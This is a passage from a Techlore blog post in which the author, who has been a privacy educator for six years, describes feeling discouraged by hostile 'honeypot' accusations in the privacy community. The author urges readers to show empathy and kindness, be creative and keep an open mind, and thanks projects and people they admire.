blog post. **(For the record, we should not be your only source of information and we encourage everyone to verify what we share as well.)** What are we supposed to do about these comments? - Delete them and deal with the inevitable accusation of limiting people’s free speech? - Engage with the comments and be accused of sheltering the projects they think are honeypots? - Ignore it and let their beliefs spread? We normally take the approach of dealing with these rumors head-on in their own dedicated content through our Privacy Misconceptions series, but the comments don’t stop. In fact, they only grow. Consequently, I’ve never felt more discouraged in my work than I do now, and this is the work I’ve been doing for 6 years. It saddens me that I’m even considering saying goodbye sometime in the near future as this has been my entire livelihood since High School. And for the record, I am not 100% innocent in these issues, none of us are. ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716426826-0.jpg) Like much of the content and resources we publish on Techlore, I want to include real takeaways and solutions for people, not just complaints about the state of things. If you’re still reading, I assume you at least somewhat agree with what was stated. If not, I applaud you for opening yourself to the discussion. Here they are: - **Learn empathy.** Remember what your life was like before you learned about the privacy world. This is still the current state of the wide majority of people in the world. - **Be kind.** I have my regrets on my journey, and I’m sure many of you do too. All we can do is move on and make improvements for tomorrow. - **Be creative.** We need people to put themselves out there creatively if we hope to have any chance of turning the needle. - **Keep an open mind.** Obtain your information from several sources. Cross-reference sources. Fact-check details. Keep nuance in mind. Learn about threat models and how pretty much every piece of hardware and software has a place in someone’s threat model, even if it has none in yours. --- **Bonus: I wanted to specifically mention some individuals/projects who are actually fantastic at avoiding these common issues. I am forever grateful for them and they’re part of the reason I’m still here.** - My team-members Tori & Jonah - Our hard-working mods inside our communities - The EFF - The Calyx Institute - The New Oil - The Opt Out Podcast and its host Seth for Privacy - Nicholas Merrill - Douglas Tuman - Sean O’Brien - Justin Ehrenhofer - NixiePixel - Ironically, Edward Snowden.